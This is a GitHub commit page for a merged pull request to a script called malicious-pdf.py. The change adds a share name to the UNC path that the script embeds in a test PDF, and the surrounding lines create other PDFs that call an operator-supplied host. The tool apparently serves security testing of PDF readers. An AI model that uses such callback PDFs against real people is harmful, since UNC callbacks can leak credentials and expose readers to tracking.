Skip to content

Commit

Permalink
Merge pull request #15 from captain-woof/main
Browse files Browse the repository at this point in the history
Added share name to test1.pdf
  • Loading branch information
jonaslejon authored Oct 20, 2024
2 parents ae2522f + 2a9d49a commit 10d08b2
Showing 1 changed file with 1 addition and 1 deletion.
2 changes: 1 addition & 1 deletion malicious-pdf.py
Original file line number Diff line number Diff line change
Expand Up @@ -619,7 +619,7 @@ def create_malpdf(filename, host):

print("[+] Creating PDF files..")

create_malpdf("test1.pdf", '\\\\' + '\\\\' + host + '\\\\' )
create_malpdf("test1.pdf", '\\\\' + '\\\\' + host + '\\\\' + 'test')
create_malpdf("test1bis.pdf", 'https://' + host)
create_malpdf2("test2.pdf", 'https://' + host)
create_malpdf3("test3.pdf", 'https://' + host)
Expand Down

0 comments on commit 10d08b2

Please sign in to comment.